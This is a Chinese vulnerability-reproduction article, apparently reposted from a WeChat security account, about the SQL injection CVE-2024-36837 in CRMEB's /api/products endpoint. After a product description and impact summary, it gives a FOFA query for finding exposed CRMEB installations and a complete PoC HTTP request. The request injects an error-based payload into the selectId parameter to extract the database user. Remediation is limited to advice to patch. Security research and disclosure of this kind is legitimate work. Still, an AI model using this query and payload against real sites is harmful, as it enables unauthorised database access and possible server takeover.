CRMEB开源电商系统 /api/products SQL注入漏洞(CVE-2024-36837)

admin
admin
admin
139544
文章
114
评论
2024年6月19日19:44:40评论182 views字数 1027阅读3分25秒阅读模式

0x02

产品介绍

CRMEB开源电商系统是一款由西安众邦网络科技有限公司打造的全栈式电商解决方案,旨在为开发者和商家提供高性能、智能化的电商平台服务。该系统集成了CRM(客户关系管理)、ERP(企业资源规划)和EB(电子商务)的功能,通过深度结合这些功能,帮助用户快速构建稳定且功能丰富的在线商城。是一款全开源可商用的系统,前后端分离开发,全部100%开源,在小程序、公众号、H5、APP、PC端都能用,使用方便,二开方便!安装使用也很简单!使用文档、接口文档、数据字典、二开文档、视频教程,各种资料应有尽有,就算你是技术小白,也能轻松上手!
0x03

漏洞威胁

2024年6月,CRMEB开源电商系统发布了新补丁,修复了一处 SQL注入漏洞(CVE-2024-36837)。经分析,该漏洞可以通过请求api的路径接口来进行SQL注入,进而可能导致敏感信息泄露,该注入可暴露后台web绝对路径,深入利用可获取服务器权限,该漏洞无前置条件且利用简单,建议受影响的用户尽快修复漏洞。
漏洞成因
该漏洞源于系统未使用有效的安全措施处理用户输入,并将用户的输入直接拼接进SQL语句中执行。这一过程导致了SQL注入漏洞的产生。
漏洞影响
该漏洞可利用SQL注入,获取后台数据库权限,获取影响范围
CRMEB <= v.5.2.2
0x04

漏洞环境

FOFA:

body="/wap/first/zsff/iconfont/iconfont.css" || body="CRMEB"

CRMEB开源电商系统 /api/products SQL注入漏洞(CVE-2024-36837)

0x05

漏洞复现

POC

GET /api/products?limit=20&priceOrder=&salesOrder=&selectId=GTID_SUBSET(CONCAT(0x7e,(SELECT+(ELT(3550=3550,user()))),0x7e),3550) HTTP/1.1Host: your-ipUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36Accept-Encoding: gzip, deflateAccept: */*Connection: keep-alive

查询当前用户

CRMEB开源电商系统 /api/products SQL注入漏洞(CVE-2024-36837)

 

原文始发于微信公众号(冷漠安全):「漏洞复现」CRMEB开源电商系统 /api/products SQL注入漏洞(CVE-2024-36837)

 

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年6月19日19:44:40
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CRMEB开源电商系统 /api/products SQL注入漏洞(CVE-2024-36837)https://cn-sec.com/archives/2864568.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息